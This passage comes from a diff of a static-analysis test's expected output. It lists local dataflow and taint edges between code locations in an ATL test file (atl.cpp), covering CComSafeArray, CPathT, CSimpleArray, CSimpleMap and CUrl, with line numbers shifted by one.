atl.cpp:573:8:573:11 | safe [post update] | atl.cpp:586:11:586:14 | safe | 
| +| atl.cpp:575:24:575:27 | safe | atl.cpp:575:24:575:28 | call to CComSafeArray | TAINT | +| atl.cpp:575:24:575:28 | call to CComSafeArray | atl.cpp:576:8:576:8 | c | | +| atl.cpp:575:24:575:28 | call to CComSafeArray | atl.cpp:577:8:577:8 | c | | +| atl.cpp:575:24:575:28 | call to CComSafeArray | atl.cpp:578:8:578:8 | c | | +| atl.cpp:575:24:575:28 | call to CComSafeArray | atl.cpp:579:8:579:8 | c | | +| atl.cpp:575:24:575:28 | call to CComSafeArray | atl.cpp:580:3:580:3 | c | | | atl.cpp:576:8:576:8 | ref arg c | atl.cpp:577:8:577:8 | c | | | atl.cpp:576:8:576:8 | ref arg c | atl.cpp:578:8:578:8 | c | | -| atl.cpp:576:8:576:8 | ref arg c | atl.cpp:579:3:579:3 | c | | +| atl.cpp:576:8:576:8 | ref arg c | atl.cpp:579:8:579:8 | c | | +| atl.cpp:576:8:576:8 | ref arg c | atl.cpp:580:3:580:3 | c | | | atl.cpp:577:8:577:8 | ref arg c | atl.cpp:578:8:578:8 | c | | -| atl.cpp:577:8:577:8 | ref arg c | atl.cpp:579:3:579:3 | c | | -| atl.cpp:578:8:578:8 | c [post update] | atl.cpp:579:3:579:3 | c | | -| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:582:10:582:10 | c | | -| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:583:10:583:10 | c | | -| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:584:10:584:10 | c | | -| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:585:5:585:5 | c | | -| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:586:10:586:10 | c | | -| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:587:10:587:10 | c | | -| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:588:10:588:10 | c | | -| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:589:35:589:35 | c | | -| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:590:3:590:3 | c | | -| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:583:10:583:10 | c | | -| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:584:10:584:10 | c | | -| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:585:5:585:5 | c | | -| atl.cpp:582:10:582:10 | ref arg c | 
atl.cpp:586:10:586:10 | c | | -| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:587:10:587:10 | c | | -| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:588:10:588:10 | c | | -| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:589:35:589:35 | c | | -| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:590:3:590:3 | c | | +| atl.cpp:577:8:577:8 | ref arg c | atl.cpp:579:8:579:8 | c | | +| atl.cpp:577:8:577:8 | ref arg c | atl.cpp:580:3:580:3 | c | | +| atl.cpp:578:8:578:8 | ref arg c | atl.cpp:579:8:579:8 | c | | +| atl.cpp:578:8:578:8 | ref arg c | atl.cpp:580:3:580:3 | c | | +| atl.cpp:579:8:579:8 | c [post update] | atl.cpp:580:3:580:3 | c | | +| atl.cpp:582:24:582:24 | call to CComSafeArray | atl.cpp:583:10:583:10 | c | | +| atl.cpp:582:24:582:24 | call to CComSafeArray | atl.cpp:584:10:584:10 | c | | +| atl.cpp:582:24:582:24 | call to CComSafeArray | atl.cpp:585:10:585:10 | c | | +| atl.cpp:582:24:582:24 | call to CComSafeArray | atl.cpp:586:5:586:5 | c | | +| atl.cpp:582:24:582:24 | call to CComSafeArray | atl.cpp:587:10:587:10 | c | | +| atl.cpp:582:24:582:24 | call to CComSafeArray | atl.cpp:588:10:588:10 | c | | +| atl.cpp:582:24:582:24 | call to CComSafeArray | atl.cpp:589:10:589:10 | c | | +| atl.cpp:582:24:582:24 | call to CComSafeArray | atl.cpp:590:35:590:35 | c | | +| atl.cpp:582:24:582:24 | call to CComSafeArray | atl.cpp:591:3:591:3 | c | | | atl.cpp:583:10:583:10 | ref arg c | atl.cpp:584:10:584:10 | c | | -| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:585:5:585:5 | c | | -| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:586:10:586:10 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:585:10:585:10 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:586:5:586:5 | c | | | atl.cpp:583:10:583:10 | ref arg c | atl.cpp:587:10:587:10 | c | | | atl.cpp:583:10:583:10 | ref arg c | atl.cpp:588:10:588:10 | c | | -| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:589:35:589:35 | c | | -| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:590:3:590:3 | c | | -| atl.cpp:584:10:584:10 | 
ref arg c | atl.cpp:585:5:585:5 | c | | -| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:586:10:586:10 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:589:10:589:10 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:590:35:590:35 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:591:3:591:3 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:585:10:585:10 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:586:5:586:5 | c | | | atl.cpp:584:10:584:10 | ref arg c | atl.cpp:587:10:587:10 | c | | | atl.cpp:584:10:584:10 | ref arg c | atl.cpp:588:10:588:10 | c | | -| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:589:35:589:35 | c | | -| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:590:3:590:3 | c | | -| atl.cpp:585:5:585:5 | ref arg c | atl.cpp:586:10:586:10 | c | | -| atl.cpp:585:5:585:5 | ref arg c | atl.cpp:587:10:587:10 | c | | -| atl.cpp:585:5:585:5 | ref arg c | atl.cpp:588:10:588:10 | c | | -| atl.cpp:585:5:585:5 | ref arg c | atl.cpp:589:35:589:35 | c | | -| atl.cpp:585:5:585:5 | ref arg c | atl.cpp:590:3:590:3 | c | | -| atl.cpp:586:10:586:10 | ref arg c | atl.cpp:587:10:587:10 | c | | -| atl.cpp:586:10:586:10 | ref arg c | atl.cpp:588:10:588:10 | c | | -| atl.cpp:586:10:586:10 | ref arg c | atl.cpp:589:35:589:35 | c | | -| atl.cpp:586:10:586:10 | ref arg c | atl.cpp:590:3:590:3 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:589:10:589:10 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:590:35:590:35 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:591:3:591:3 | c | | +| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:586:5:586:5 | c | | +| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:587:10:587:10 | c | | +| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:588:10:588:10 | c | | +| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:589:10:589:10 | c | | +| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:590:35:590:35 | c | | +| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:591:3:591:3 | c | | +| atl.cpp:586:5:586:5 | ref arg c | 
atl.cpp:587:10:587:10 | c | | +| atl.cpp:586:5:586:5 | ref arg c | atl.cpp:588:10:588:10 | c | | +| atl.cpp:586:5:586:5 | ref arg c | atl.cpp:589:10:589:10 | c | | +| atl.cpp:586:5:586:5 | ref arg c | atl.cpp:590:35:590:35 | c | | +| atl.cpp:586:5:586:5 | ref arg c | atl.cpp:591:3:591:3 | c | | | atl.cpp:587:10:587:10 | ref arg c | atl.cpp:588:10:588:10 | c | | -| atl.cpp:587:10:587:10 | ref arg c | atl.cpp:589:35:589:35 | c | | -| atl.cpp:587:10:587:10 | ref arg c | atl.cpp:590:3:590:3 | c | | -| atl.cpp:588:10:588:10 | ref arg c | atl.cpp:589:35:589:35 | c | | -| atl.cpp:588:10:588:10 | ref arg c | atl.cpp:590:3:590:3 | c | | -| atl.cpp:589:35:589:35 | ref arg c | atl.cpp:590:3:590:3 | c | | -| atl.cpp:592:24:592:24 | call to CComSafeArray | atl.cpp:593:5:593:5 | c | | -| atl.cpp:592:24:592:24 | call to CComSafeArray | atl.cpp:594:10:594:10 | c | | -| atl.cpp:592:24:592:24 | call to CComSafeArray | atl.cpp:595:10:595:10 | c | | -| atl.cpp:592:24:592:24 | call to CComSafeArray | atl.cpp:596:10:596:10 | c | | -| atl.cpp:592:24:592:24 | call to CComSafeArray | atl.cpp:597:3:597:3 | c | | -| atl.cpp:593:5:593:5 | ref arg c | atl.cpp:594:10:594:10 | c | | -| atl.cpp:593:5:593:5 | ref arg c | atl.cpp:595:10:595:10 | c | | -| atl.cpp:593:5:593:5 | ref arg c | atl.cpp:596:10:596:10 | c | | -| atl.cpp:593:5:593:5 | ref arg c | atl.cpp:597:3:597:3 | c | | -| atl.cpp:594:10:594:10 | ref arg c | atl.cpp:595:10:595:10 | c | | -| atl.cpp:594:10:594:10 | ref arg c | atl.cpp:596:10:596:10 | c | | -| atl.cpp:594:10:594:10 | ref arg c | atl.cpp:597:3:597:3 | c | | +| atl.cpp:587:10:587:10 | ref arg c | atl.cpp:589:10:589:10 | c | | +| atl.cpp:587:10:587:10 | ref arg c | atl.cpp:590:35:590:35 | c | | +| atl.cpp:587:10:587:10 | ref arg c | atl.cpp:591:3:591:3 | c | | +| atl.cpp:588:10:588:10 | ref arg c | atl.cpp:589:10:589:10 | c | | +| atl.cpp:588:10:588:10 | ref arg c | atl.cpp:590:35:590:35 | c | | +| atl.cpp:588:10:588:10 | ref arg c | atl.cpp:591:3:591:3 | c | | +| 
atl.cpp:589:10:589:10 | ref arg c | atl.cpp:590:35:590:35 | c | | +| atl.cpp:589:10:589:10 | ref arg c | atl.cpp:591:3:591:3 | c | | +| atl.cpp:590:35:590:35 | ref arg c | atl.cpp:591:3:591:3 | c | | +| atl.cpp:593:24:593:24 | call to CComSafeArray | atl.cpp:594:5:594:5 | c | | +| atl.cpp:593:24:593:24 | call to CComSafeArray | atl.cpp:595:10:595:10 | c | | +| atl.cpp:593:24:593:24 | call to CComSafeArray | atl.cpp:596:10:596:10 | c | | +| atl.cpp:593:24:593:24 | call to CComSafeArray | atl.cpp:597:10:597:10 | c | | +| atl.cpp:593:24:593:24 | call to CComSafeArray | atl.cpp:598:3:598:3 | c | | +| atl.cpp:594:5:594:5 | ref arg c | atl.cpp:595:10:595:10 | c | | +| atl.cpp:594:5:594:5 | ref arg c | atl.cpp:596:10:596:10 | c | | +| atl.cpp:594:5:594:5 | ref arg c | atl.cpp:597:10:597:10 | c | | +| atl.cpp:594:5:594:5 | ref arg c | atl.cpp:598:3:598:3 | c | | | atl.cpp:595:10:595:10 | ref arg c | atl.cpp:596:10:596:10 | c | | -| atl.cpp:595:10:595:10 | ref arg c | atl.cpp:597:3:597:3 | c | | -| atl.cpp:596:10:596:10 | ref arg c | atl.cpp:597:3:597:3 | c | | -| atl.cpp:599:24:599:24 | call to CComSafeArray | atl.cpp:600:5:600:5 | c | | -| atl.cpp:599:24:599:24 | call to CComSafeArray | atl.cpp:601:10:601:10 | c | | -| atl.cpp:599:24:599:24 | call to CComSafeArray | atl.cpp:602:10:602:10 | c | | -| atl.cpp:599:24:599:24 | call to CComSafeArray | atl.cpp:603:3:603:3 | c | | -| atl.cpp:600:5:600:5 | ref arg c | atl.cpp:601:10:601:10 | c | | -| atl.cpp:600:5:600:5 | ref arg c | atl.cpp:602:10:602:10 | c | | -| atl.cpp:600:5:600:5 | ref arg c | atl.cpp:603:3:603:3 | c | | -| atl.cpp:601:10:601:10 | ref arg c | atl.cpp:602:10:602:10 | c | | -| atl.cpp:601:10:601:10 | ref arg c | atl.cpp:603:3:603:3 | c | | -| atl.cpp:602:10:602:10 | ref arg c | atl.cpp:603:3:603:3 | c | | -| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:665:11:665:11 | x | | -| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:674:20:674:20 | x | | -| atl.cpp:664:13:664:33 | call to 
indirect_source | atl.cpp:679:14:679:14 | x | | -| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:687:11:687:11 | x | | -| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:693:15:693:15 | x | | -| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:698:24:698:24 | x | | -| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:704:30:704:30 | x | | -| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:674:20:674:20 | x | | -| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:679:14:679:14 | x | | -| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:687:11:687:11 | x | | -| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:693:15:693:15 | x | | -| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:698:24:698:24 | x | | -| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:704:30:704:30 | x | | -| atl.cpp:665:11:665:11 | x | atl.cpp:665:11:665:12 | call to CPathT | TAINT | -| atl.cpp:665:11:665:12 | call to CPathT | atl.cpp:666:27:666:27 | p | | -| atl.cpp:665:11:665:12 | call to CPathT | atl.cpp:667:8:667:8 | p | | -| atl.cpp:665:11:665:12 | call to CPathT | atl.cpp:669:12:669:12 | p | | -| atl.cpp:666:27:666:27 | ref arg p | atl.cpp:667:8:667:8 | p | | -| atl.cpp:666:27:666:27 | ref arg p | atl.cpp:669:12:669:12 | p | | -| atl.cpp:667:8:667:8 | p [post update] | atl.cpp:669:12:669:12 | p | | -| atl.cpp:667:10:667:18 | ref arg m_strPath | atl.cpp:670:11:670:19 | m_strPath | | -| atl.cpp:669:12:669:12 | p | atl.cpp:669:12:669:13 | call to CPathT | | -| atl.cpp:669:12:669:13 | call to CPathT | atl.cpp:670:8:670:9 | p2 | | -| atl.cpp:673:11:673:11 | call to CPathT | atl.cpp:674:5:674:5 | p | | -| atl.cpp:673:11:673:11 | call to CPathT | atl.cpp:675:10:675:10 | p | | -| atl.cpp:674:5:674:5 | ref arg p | atl.cpp:675:10:675:10 | p | | -| atl.cpp:674:20:674:20 | ref arg x | atl.cpp:679:14:679:14 | x | | -| atl.cpp:674:20:674:20 | ref arg x | atl.cpp:687:11:687:11 | x | | -| atl.cpp:674:20:674:20 | ref arg x | atl.cpp:693:15:693:15 | x | | -| atl.cpp:674:20:674:20 | ref arg x | 
atl.cpp:698:24:698:24 | x | | -| atl.cpp:674:20:674:20 | ref arg x | atl.cpp:704:30:704:30 | x | | -| atl.cpp:678:11:678:11 | call to CPathT | atl.cpp:679:5:679:5 | p | | -| atl.cpp:678:11:678:11 | call to CPathT | atl.cpp:680:10:680:10 | p | | -| atl.cpp:678:11:678:11 | call to CPathT | atl.cpp:683:11:683:11 | p | | -| atl.cpp:678:11:678:11 | call to CPathT | atl.cpp:684:10:684:10 | p | | -| atl.cpp:678:11:678:11 | call to CPathT | atl.cpp:688:10:688:10 | p | | -| atl.cpp:679:5:679:5 | ref arg p | atl.cpp:680:10:680:10 | p | | -| atl.cpp:679:5:679:5 | ref arg p | atl.cpp:683:11:683:11 | p | | -| atl.cpp:679:5:679:5 | ref arg p | atl.cpp:684:10:684:10 | p | | -| atl.cpp:679:5:679:5 | ref arg p | atl.cpp:688:10:688:10 | p | | -| atl.cpp:679:14:679:14 | ref arg x | atl.cpp:687:11:687:11 | x | | -| atl.cpp:679:14:679:14 | ref arg x | atl.cpp:693:15:693:15 | x | | -| atl.cpp:679:14:679:14 | ref arg x | atl.cpp:698:24:698:24 | x | | -| atl.cpp:679:14:679:14 | ref arg x | atl.cpp:704:30:704:30 | x | | -| atl.cpp:680:10:680:10 | p [post update] | atl.cpp:683:11:683:11 | p | | -| atl.cpp:680:10:680:10 | p [post update] | atl.cpp:684:10:684:10 | p | | -| atl.cpp:680:10:680:10 | p [post update] | atl.cpp:688:10:688:10 | p | | -| atl.cpp:680:12:680:20 | ref arg m_strPath | atl.cpp:684:12:684:20 | m_strPath | | -| atl.cpp:680:12:680:20 | ref arg m_strPath | atl.cpp:688:12:688:20 | m_strPath | | -| atl.cpp:682:11:682:12 | call to CPathT | atl.cpp:683:5:683:6 | p2 | | -| atl.cpp:683:11:683:11 | call to operator char *& | atl.cpp:683:8:683:8 | call to operator+= | TAINT | -| atl.cpp:683:11:683:11 | ref arg p | atl.cpp:684:10:684:10 | p | | -| atl.cpp:683:11:683:11 | ref arg p | atl.cpp:688:10:688:10 | p | | -| atl.cpp:684:10:684:10 | p [post update] | atl.cpp:688:10:688:10 | p | | -| atl.cpp:684:12:684:20 | ref arg m_strPath | atl.cpp:688:12:688:20 | m_strPath | | -| atl.cpp:686:11:686:12 | call to CPathT | atl.cpp:687:5:687:6 | p3 | | -| atl.cpp:687:11:687:11 | ref arg x | 
atl.cpp:693:15:693:15 | x | | -| atl.cpp:687:11:687:11 | ref arg x | atl.cpp:698:24:698:24 | x | | -| atl.cpp:687:11:687:11 | ref arg x | atl.cpp:704:30:704:30 | x | | -| atl.cpp:687:11:687:11 | x | atl.cpp:687:8:687:8 | call to operator+= | TAINT | -| atl.cpp:692:11:692:11 | call to CPathT | atl.cpp:693:5:693:5 | p | | -| atl.cpp:692:11:692:11 | call to CPathT | atl.cpp:694:10:694:10 | p | | -| atl.cpp:693:5:693:5 | ref arg p | atl.cpp:694:10:694:10 | p | | -| atl.cpp:693:15:693:15 | ref arg x | atl.cpp:698:24:698:24 | x | | -| atl.cpp:693:15:693:15 | ref arg x | atl.cpp:704:30:704:30 | x | | -| atl.cpp:697:11:697:11 | call to CPathT | atl.cpp:698:5:698:5 | p | | -| atl.cpp:697:11:697:11 | call to CPathT | atl.cpp:699:10:699:10 | p | | -| atl.cpp:698:5:698:5 | ref arg p | atl.cpp:699:10:699:10 | p | | -| atl.cpp:698:24:698:24 | ref arg x | atl.cpp:704:30:704:30 | x | | -| atl.cpp:703:11:703:11 | call to CPathT | atl.cpp:704:15:704:15 | p | | -| atl.cpp:704:17:704:28 | call to CommonPrefix | atl.cpp:705:10:705:11 | p2 | | -| atl.cpp:704:17:704:28 | call to CommonPrefix | atl.cpp:706:10:706:11 | p2 | | -| atl.cpp:705:10:705:11 | p2 [post update] | atl.cpp:706:10:706:11 | p2 | | -| atl.cpp:733:11:733:21 | call to source | atl.cpp:736:11:736:11 | x | | -| atl.cpp:733:11:733:21 | call to source | atl.cpp:748:11:748:11 | x | | -| atl.cpp:733:11:733:21 | call to source | atl.cpp:752:23:752:23 | x | | -| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:736:5:736:5 | a | | -| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:737:10:737:10 | a | | -| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:738:5:738:5 | a | | -| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:739:10:739:10 | a | | -| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:743:10:743:10 | a | | -| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:745:3:745:3 | a | | -| atl.cpp:736:5:736:5 | ref arg a | atl.cpp:737:10:737:10 | a | | -| atl.cpp:736:5:736:5 | ref arg a | 
atl.cpp:738:5:738:5 | a | | -| atl.cpp:736:5:736:5 | ref arg a | atl.cpp:739:10:739:10 | a | | -| atl.cpp:736:5:736:5 | ref arg a | atl.cpp:743:10:743:10 | a | | -| atl.cpp:736:5:736:5 | ref arg a | atl.cpp:745:3:745:3 | a | | -| atl.cpp:737:10:737:10 | ref arg a | atl.cpp:738:5:738:5 | a | | -| atl.cpp:737:10:737:10 | ref arg a | atl.cpp:739:10:739:10 | a | | -| atl.cpp:737:10:737:10 | ref arg a | atl.cpp:743:10:743:10 | a | | -| atl.cpp:737:10:737:10 | ref arg a | atl.cpp:745:3:745:3 | a | | -| atl.cpp:738:5:738:5 | ref arg a | atl.cpp:739:10:739:10 | a | | -| atl.cpp:738:5:738:5 | ref arg a | atl.cpp:743:10:743:10 | a | | -| atl.cpp:738:5:738:5 | ref arg a | atl.cpp:745:3:745:3 | a | | -| atl.cpp:739:10:739:10 | ref arg a | atl.cpp:743:10:743:10 | a | | -| atl.cpp:739:10:739:10 | ref arg a | atl.cpp:745:3:745:3 | a | | -| atl.cpp:741:23:741:24 | call to CSimpleArray | atl.cpp:742:10:742:11 | a2 | | -| atl.cpp:741:23:741:24 | call to CSimpleArray | atl.cpp:743:5:743:6 | a2 | | -| atl.cpp:741:23:741:24 | call to CSimpleArray | atl.cpp:744:10:744:11 | a2 | | -| atl.cpp:741:23:741:24 | call to CSimpleArray | atl.cpp:745:3:745:3 | a2 | | -| atl.cpp:742:10:742:11 | ref arg a2 | atl.cpp:743:5:743:6 | a2 | | -| atl.cpp:742:10:742:11 | ref arg a2 | atl.cpp:744:10:744:11 | a2 | | -| atl.cpp:742:10:742:11 | ref arg a2 | atl.cpp:745:3:745:3 | a2 | | -| atl.cpp:743:5:743:6 | ref arg a2 | atl.cpp:744:10:744:11 | a2 | | -| atl.cpp:743:5:743:6 | ref arg a2 | atl.cpp:745:3:745:3 | a2 | | -| atl.cpp:743:10:743:10 | a | atl.cpp:743:5:743:6 | ref arg a2 | TAINT | -| atl.cpp:743:10:743:10 | a | atl.cpp:743:8:743:8 | call to operator= | TAINT | -| atl.cpp:744:10:744:11 | ref arg a2 | atl.cpp:745:3:745:3 | a2 | | -| atl.cpp:747:23:747:23 | call to CSimpleArray | atl.cpp:748:5:748:5 | a | | -| atl.cpp:747:23:747:23 | call to CSimpleArray | atl.cpp:749:10:749:10 | a | | -| atl.cpp:747:23:747:23 | call to CSimpleArray | atl.cpp:754:3:754:3 | a | | -| atl.cpp:748:5:748:5 | ref arg a | 
atl.cpp:749:10:749:10 | a | | -| atl.cpp:748:5:748:5 | ref arg a | atl.cpp:754:3:754:3 | a | | -| atl.cpp:749:10:749:10 | ref arg a | atl.cpp:754:3:754:3 | a | | -| atl.cpp:751:23:751:24 | call to CSimpleArray | atl.cpp:752:15:752:16 | a2 | | -| atl.cpp:751:23:751:24 | call to CSimpleArray | atl.cpp:753:10:753:11 | a2 | | -| atl.cpp:751:23:751:24 | call to CSimpleArray | atl.cpp:754:3:754:3 | a2 | | -| atl.cpp:752:18:752:21 | call to Find | atl.cpp:753:13:753:15 | pos | | -| atl.cpp:753:10:753:11 | ref arg a2 | atl.cpp:754:3:754:3 | a2 | | -| atl.cpp:778:16:778:31 | call to source | atl.cpp:781:20:781:20 | x | | -| atl.cpp:778:16:778:31 | call to source | atl.cpp:791:26:791:26 | x | | -| atl.cpp:778:16:778:31 | call to source | atl.cpp:796:32:796:32 | x | | -| atl.cpp:778:16:778:31 | call to source | atl.cpp:802:22:802:22 | x | | -| atl.cpp:778:16:778:31 | call to source | atl.cpp:807:30:807:30 | x | | -| atl.cpp:780:33:780:33 | call to CSimpleMap | atl.cpp:781:5:781:5 | a | | -| atl.cpp:780:33:780:33 | call to CSimpleMap | atl.cpp:782:10:782:10 | a | | -| atl.cpp:780:33:780:33 | call to CSimpleMap | atl.cpp:783:3:783:3 | a | | -| atl.cpp:781:5:781:5 | ref arg a | atl.cpp:782:10:782:10 | a | | -| atl.cpp:781:5:781:5 | ref arg a | atl.cpp:783:3:783:3 | a | | -| atl.cpp:782:10:782:10 | ref arg a | atl.cpp:783:3:783:3 | a | | -| atl.cpp:785:33:785:33 | call to CSimpleMap | atl.cpp:786:16:786:16 | a | | -| atl.cpp:785:33:785:33 | call to CSimpleMap | atl.cpp:787:10:787:10 | a | | -| atl.cpp:785:33:785:33 | call to CSimpleMap | atl.cpp:788:3:788:3 | a | | -| atl.cpp:786:18:786:24 | call to FindKey | atl.cpp:787:23:787:25 | pos | | -| atl.cpp:787:10:787:10 | ref arg a | atl.cpp:788:3:788:3 | a | | -| atl.cpp:790:33:790:33 | call to CSimpleMap | atl.cpp:791:16:791:16 | a | | -| atl.cpp:790:33:790:33 | call to CSimpleMap | atl.cpp:792:10:792:10 | a | | -| atl.cpp:790:33:790:33 | call to CSimpleMap | atl.cpp:793:3:793:3 | a | | -| atl.cpp:791:18:791:24 | call to FindVal | 
atl.cpp:792:23:792:25 | pos | | -| atl.cpp:792:10:792:10 | ref arg a | atl.cpp:793:3:793:3 | a | | -| atl.cpp:795:33:795:33 | call to CSimpleMap | atl.cpp:796:16:796:16 | a | | -| atl.cpp:795:33:795:33 | call to CSimpleMap | atl.cpp:798:10:798:10 | a | | -| atl.cpp:795:33:795:33 | call to CSimpleMap | atl.cpp:799:3:799:3 | a | | -| atl.cpp:796:16:796:16 | ref arg a | atl.cpp:798:10:798:10 | a | | -| atl.cpp:796:16:796:16 | ref arg a | atl.cpp:799:3:799:3 | a | | -| atl.cpp:796:18:796:30 | call to ReverseLookup | atl.cpp:797:10:797:12 | key | | -| atl.cpp:796:18:796:30 | call to ReverseLookup | atl.cpp:798:19:798:21 | key | | -| atl.cpp:797:10:797:12 | ref arg key | atl.cpp:798:19:798:21 | key | | -| atl.cpp:798:10:798:10 | ref arg a | atl.cpp:799:3:799:3 | a | | -| atl.cpp:801:33:801:33 | call to CSimpleMap | atl.cpp:802:5:802:5 | a | | -| atl.cpp:801:33:801:33 | call to CSimpleMap | atl.cpp:803:10:803:10 | a | | -| atl.cpp:801:33:801:33 | call to CSimpleMap | atl.cpp:804:3:804:3 | a | | -| atl.cpp:802:5:802:5 | ref arg a | atl.cpp:803:10:803:10 | a | | -| atl.cpp:802:5:802:5 | ref arg a | atl.cpp:804:3:804:3 | a | | -| atl.cpp:803:10:803:10 | ref arg a | atl.cpp:804:3:804:3 | a | | -| atl.cpp:806:33:806:33 | call to CSimpleMap | atl.cpp:807:5:807:5 | a | | -| atl.cpp:806:33:806:33 | call to CSimpleMap | atl.cpp:808:10:808:10 | a | | -| atl.cpp:806:33:806:33 | call to CSimpleMap | atl.cpp:809:3:809:3 | a | | -| atl.cpp:807:5:807:5 | ref arg a | atl.cpp:808:10:808:10 | a | | -| atl.cpp:807:5:807:5 | ref arg a | atl.cpp:809:3:809:3 | a | | -| atl.cpp:808:10:808:10 | ref arg a | atl.cpp:809:3:809:3 | a | | -| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:852:16:852:16 | x | | -| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:865:19:865:19 | x | | -| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:871:23:871:23 | x | | -| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:876:22:876:22 | x | | -| atl.cpp:850:13:850:33 | call to 
indirect_source | atl.cpp:881:22:881:22 | x | | -| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:886:24:886:24 | x | | -| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:891:21:891:21 | x | | -| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:896:22:896:22 | x | | -| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:852:3:852:5 | url | | -| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:853:8:853:10 | url | | -| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:854:8:854:10 | url | | -| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:855:8:855:10 | url | | -| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:856:8:856:10 | url | | -| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:857:8:857:10 | url | | -| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:858:8:858:10 | url | | -| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:859:8:859:10 | url | | -| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:899:1:899:1 | url | | -| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:853:8:853:10 | url | | -| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:854:8:854:10 | url | | -| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:855:8:855:10 | url | | -| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:856:8:856:10 | url | | -| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:857:8:857:10 | url | | -| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:858:8:858:10 | url | | -| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:859:8:859:10 | url | | -| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:899:1:899:1 | url | | -| atl.cpp:862:10:862:13 | call to CUrl | atl.cpp:865:5:865:8 | url2 | | -| atl.cpp:862:10:862:13 | call to CUrl | atl.cpp:866:5:866:8 | url2 | | -| atl.cpp:862:10:862:13 | call to CUrl | atl.cpp:868:3:868:3 | url2 | | -| atl.cpp:863:11:863:13 | len | atl.cpp:866:29:866:31 | len | | -| atl.cpp:864:10:864:15 | buffer | atl.cpp:866:20:866:25 | buffer | | -| atl.cpp:864:10:864:15 | buffer | atl.cpp:867:10:867:15 | buffer | | -| atl.cpp:865:5:865:8 | ref arg url2 | atl.cpp:866:5:866:8 | url2 | | 
